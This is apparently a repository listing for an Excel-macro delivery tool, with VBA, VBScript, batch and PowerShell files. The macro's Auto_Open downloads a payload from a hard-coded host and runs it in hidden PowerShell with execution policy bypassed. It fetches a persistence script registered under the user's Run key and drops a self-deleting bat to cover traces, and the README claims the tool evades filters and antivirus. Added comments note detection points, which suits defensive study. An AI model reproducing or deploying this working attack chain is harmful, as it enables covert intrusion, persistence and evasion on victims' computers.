├── RemovePayload.bat
├── Cleanup.ps1
├── ChangeLog.txt
├── README.md
├── persist.vbs
└── MacroCode

/RemovePayload.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 |
3 | timeout /t 30
4 | del /Q "C:\Temp\payload.ps1"
5 | del /Q "%~f0"
6 |
--------------------------------------------------------------------------------
/Cleanup.ps1:
--------------------------------------------------------------------------------
1 | $Path = "C:\Temp\persist.vbs"
2 | If(Test-Path -Path $Path){
3 | Remove-Item($Path)
4 | }
5 |
6 | $RegKeyPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
7 | $Value = (Get-ItemProperty $RegKeyPath).Persist -eq $null
8 | If ($Value -eq $False) {Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Persist}
9 | Else { }
10 |
--------------------------------------------------------------------------------
/ChangeLog.txt:
--------------------------------------------------------------------------------
1 | Changes made as of 1/4/13
2 |
3 | -Revamped code by adding functions in the VBA
4 | -Added system architecture checks. All you have to do now is host one 32-bit payload and the macro will choose the proper
5 | powershell path.
6 | -Added a self-deleting bat to remove the payload from the system.
7 | -Updated the persist script to also do system architecture checks and choose the correct powershell path.
8 | -Updated the cleanup script
9 |
10 |
11 | --- @enigma0x3
12 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Powershell-payload-Excel-Delivery
2 | =================================
3 |
4 | Follow me on Twitter: @enigma0x3
5 |
6 | Contains automatic persistence.
7 |
8 |
9 | Persist.vbs, a 32-bit payload and the bat file need to be accessible to the target (such as a webserver).
10 |
11 | This attack uses an Excel document to get into the organization (bypassing filters and scans), determines the system's architecture, pulls down the payload and executes it. It then pulls down a persistence script, drops it, and creates an autorun registry key for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system.
12 |
13 | Once the payload is run, it runs in the powershell process, so if the user closes Excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed. AV also does not pick this up.
14 |
15 | Shoutout to @TheColonial for helping me with the code for hiding the window upon payload execution and testing the code as it was developed. Big thanks mate :)
16 |
17 | PowerSploit Function: Invoke-Shellcode
18 | Author: Matthew Graeber (@mattifestation)
19 | License: BSD 3-Clause
20 | Required Dependencies: None
21 | Optional Dependencies: None
22 |
--------------------------------------------------------------------------------
/persist.vbs:
--------------------------------------------------------------------------------
1 | Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
2 |
3 | Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
4 |
5 | Dim filesys
6 |
7 |
8 |
9 |
10 | Const HIDDEN_WINDOW = 0
11 |
12 | If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth = 32 Then
13 | xHttp.Open "GET", "http://192.168.1.127/x32.ps1", False
14 | xHttp.Send
15 | with bStrm
16 | .type = 1
17 | .open
18 | .write xHttp.ResponseBody
19 | .savetofile "C:\temp\payload.ps1"
20 | end with
21 | strComputer = "."
' persist.vbs, continued (still inside the 32-bit branch of the AddressWidth check).
' The script starts PowerShell through WMI Win32_Process.Create with ShowWindow = 0,
' so no window is shown to the logged-on user.
' Detection: the command line below carries "-ExecutionPolicy Bypass -WindowStyle Hidden"
' together with "-file C:\Temp\payload.ps1"; process-creation logging with command lines
' records it even though the file itself is deleted later in this script.
' NOTE(review): processes created via Win32_Process.Create usually appear under the WMI
' provider host rather than under the script host - confirm against your own telemetry.
22 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
23 | Set objStartup = objWMIService.Get("Win32_ProcessStartup")
24 | Set objConfig = objStartup.SpawnInstance_
25 | objConfig.ShowWindow = HIDDEN_WINDOW
26 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
27 | objProcess.Create "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID
28 |
29 |
30 |
31 | Else
32 |
' Non-32-bit branch: requests the same x32.ps1 URL and writes the same C:\temp\payload.ps1
' as the 32-bit branch; the only difference is the sysWOW64 PowerShell path further down.
33 | xHttp.Open "GET", "http://192.168.1.127/x32.ps1", False
34 | xHttp.Send
35 | with bStrm
36 | .type = 1
37 | .open
38 | .write xHttp.ResponseBody
39 | .savetofile "C:\temp\payload.ps1"
40 | end with
41 | strComputer = "."
42 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
43 | Set objStartup = objWMIService.Get("Win32_ProcessStartup")
44 | Set objConfig = objStartup.SpawnInstance_
45 | objConfig.ShowWindow = HIDDEN_WINDOW
46 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
47 | objProcess.Create "C:\\Windows\\sysWOW64\\WindowsPowerShell\\v1.0\\Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID
48 |
49 |
50 | End If
51 |
52 |
' After a 30000 ms sleep the script deletes C:\Temp\payload.ps1 if it exists.
' Forensics: the .ps1 is on disk only briefly per run, so file-based evidence is short-lived;
' the PowerShell process was started with -noexit and is not stopped by this script.
53 | WScript.Sleep 30000
54 | Set filesys = CreateObject("Scripting.FileSystemObject")
55 | If filesys.FileExists("C:\Temp\payload.ps1") Then
56 | filesys.DeleteFile "C:\Temp\payload.ps1"
57 | End If
58 |
--------------------------------------------------------------------------------
/MacroCode:
--------------------------------------------------------------------------------
' Auto_Open is the macro name Excel runs automatically when the workbook is opened
' (subject to the host's macro security settings), so everything below runs without
' further user action once macros are allowed.
' Order of operations: Download, then Execute32 or Execute64 depending on the CPU
' AddressWidth reported by WMI, then Persist, DropBat and RemovePayload.
1 | Sub Auto_Open()
2 | Download
3 | If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth = 32 Then
4 | Execute32
5 | Else
6 | Execute64
7 | End If
8 | Persist
9 | DropBat
10 | RemovePayload
11 | End Sub
12 |
' Download: fetches http://192.168.1.127/x32.ps1 over plain HTTP with a WinHTTP COM object
' and writes the response body to C:\Temp\payload.ps1, creating C:\Temp if it is missing.
' 192.168.1.127 is a private (RFC 1918) address hard-coded in this listing.
' Detection: an Office process issuing an HTTP GET and then writing a .ps1 file under C:\Temp.
' No value is assigned to the function name, so nothing meaningful is returned.
13 | Public Function Download() As Variant
14 |
15 | Dim FileNum As Long
16 | Dim FileData() As Byte
17 | Dim MyFile As String
18 | Dim WHTTP As Object
19 |
' Tries the "WinHTTP.WinHTTPrequest.5" ProgID first and falls back to ".5.1" when creation
' fails; error trapping is restored by On Error GoTo 0 before the request is made.
20 | On Error Resume Next
21 | Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5")
22 | If Err.Number <> 0 Then
23 | Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5.1")
24 | End If
25 | On Error GoTo 0
26 |
27 | MyFile = "http://192.168.1.127/x32.ps1"
28 |
29 | WHTTP.Open "GET", MyFile, False
30 | WHTTP.Send
31 | FileData = WHTTP.ResponseBody
32 | Set WHTTP = Nothing
33 |
34 | If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp"
35 | FileNum = FreeFile
36 | Open "C:\Temp\payload.ps1" For Binary Access Write As #FileNum
37 | Put #FileNum, 1, FileData
38 | Close #FileNum
39 |
40 | End Function
' Execute32: starts the system32 PowerShell on C:\Temp\payload.ps1 through
' WMI Win32_Process.Create with ShowWindow = 0 (hidden window).
' Detection: PowerShell command line with "-ExecutionPolicy Bypass -WindowStyle Hidden
' -noprofile -noexit -file C:\Temp\payload.ps1"; -noexit keeps the process alive afterwards.
' NOTE(review): because the process is created through WMI it is likely not recorded as a
' direct child of Excel - confirm in process-creation telemetry before writing parent-based rules.
41 | Public Function Execute32() As Variant
42 |
43 | Const HIDDEN_WINDOW = 0
44 | strComputer = "."
45 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
46 |
47 | Set objStartup = objWMIService.Get("Win32_ProcessStartup")
48 | Set objConfig = objStartup.SpawnInstance_
49 | objConfig.ShowWindow = HIDDEN_WINDOW
50 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
51 | objProcess.Create "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID
52 |
53 |
54 | End Function
55 |
' Execute64: same as Execute32 except that it uses the SysWOW64 PowerShell path, i.e. the
' 32-bit PowerShell on a 64-bit system, matching the single 32-bit payload the ChangeLog describes.
56 | Public Function Execute64() As Variant
57 | Const HIDDEN_WINDOW = 0
58 | strComputer = "."
59 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
60 |
61 | Set objStartup = objWMIService.Get("Win32_ProcessStartup")
62 | Set objConfig = objStartup.SpawnInstance_
63 | objConfig.ShowWindow = HIDDEN_WINDOW
64 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
65 | objProcess.Create "C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -file C:\Temp\payload.ps1", Null, objConfig, intProcessID
66 | End Function
67 |
' Persist: fetches http://192.168.1.127/persist.vbs, writes it to C:\Temp\persist.vbs and
' registers it under the current user's Run key as a value named "Persist".
' Detection / triage: a Run value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run
' named Persist that points at a .vbs in C:\Temp; no elevation is needed because the key is per-user.
' Cleanup.ps1 in this listing removes exactly these two artifacts (the file and the Run value).
68 | Public Function Persist() As Variant
69 | Dim FileNum1 As Long
70 | Dim FileData1() As Byte
71 | Dim MyFile1 As String
72 | Dim WHTTP1 As Object
73 | Dim WshShell As Object
74 |
75 | On Error Resume Next
76 | Set WHTTP1 = CreateObject("WinHTTP.WinHTTPrequest.5")
77 | If Err.Number <> 0 Then
78 | Set WHTTP1 = CreateObject("WinHTTP.WinHTTPrequest.5.1")
79 | End If
80 | On Error GoTo 0
81 |
82 | MyFile1 = "http://192.168.1.127/persist.vbs"
83 |
84 | WHTTP1.Open "GET", MyFile1, False
85 | WHTTP1.Send
86 | FileData1 = WHTTP1.ResponseBody
' NOTE(review): the name below is WHTT1P, not WHTTP1, so WHTTP1 itself is not set to Nothing here.
87 | Set WHTT1P = Nothing
88 |
89 | If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp"
90 | FileNum1 = FreeFile
91 | Open "C:\Temp\persist.vbs" For Binary Access Write As #FileNum1
92 | Put #FileNum1, 1, FileData1
93 | Close #FileNum1
94 |
95 |
96 | Set WshShell = CreateObject("WScript.Shell")
97 | WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Persist", "C:\Temp\persist.vbs", "REG_SZ"
98 | Set WshShell = Nothing
99 |
100 |
101 |
102 | End Function
103 |
104 |
' DropBat: fetches http://192.168.1.127/remove.bat and writes it to C:\Temp\remove.bat,
' using the same WinHTTP download-and-write pattern as Download and Persist.
' Detection: a third HTTP GET to the same host from the Office process, followed by a .bat
' written under C:\Temp.
105 | Public Function DropBat() As Variant
106 | Dim FileNum2 As Long
107 | Dim FileData2() As Byte
108 | Dim MyFile2 As String
109 | Dim WHTTP2 As Object
110 |
111 | On Error Resume Next
112 | Set WHTTP2 = CreateObject("WinHTTP.WinHTTPrequest.5")
113 | If Err.Number <> 0 Then
114 | Set WHTTP2 = CreateObject("WinHTTP.WinHTTPrequest.5.1")
115 | End If
116 | On Error GoTo 0
117 |
118 | MyFile2 = "http://192.168.1.127/remove.bat"
119 |
120 | WHTTP2.Open "GET", MyFile2, False
121 | WHTTP2.Send
122 | FileData2 = WHTTP2.ResponseBody
123 | Set WHTTP2 = Nothing
124 |
125 | If Dir("C:\Temp", vbDirectory) = Empty Then MkDir "C:\Temp"
126 | FileNum2 = FreeFile
127 | Open "C:\Temp\remove.bat" For Binary Access Write As #FileNum2
128 | Put #FileNum2, 1, FileData2
129 | Close #FileNum2
130 |
131 | End Function
132 |
133 |
' RemovePayload: runs C:\Temp\remove.bat through cmd.exe /C, again via WMI
' Win32_Process.Create with a hidden window.
' Detection: cmd.exe command line "/C C:\Temp\remove.bat". The contents of the hosted
' remove.bat are not shown in this function; the RemovePayload.bat in this listing waits
' 30 seconds, deletes C:\Temp\payload.ps1 and then deletes itself.
134 | Public Function RemovePayload() As Variant
135 |
136 | Const HIDDEN_WINDOW = 0
137 | strComputer = "."
138 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
139 |
140 | Set objStartup = objWMIService.Get("Win32_ProcessStartup")
141 | Set objConfig = objStartup.SpawnInstance_
142 | objConfig.ShowWindow = HIDDEN_WINDOW
143 | Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
144 | objProcess.Create "C:\\WINDOWS\\system32\\cmd.exe /C C:\Temp\remove.bat", Null, objConfig, intProcessID
145 |
146 | End Function
147 |
148 |
--------------------------------------------------------------------------------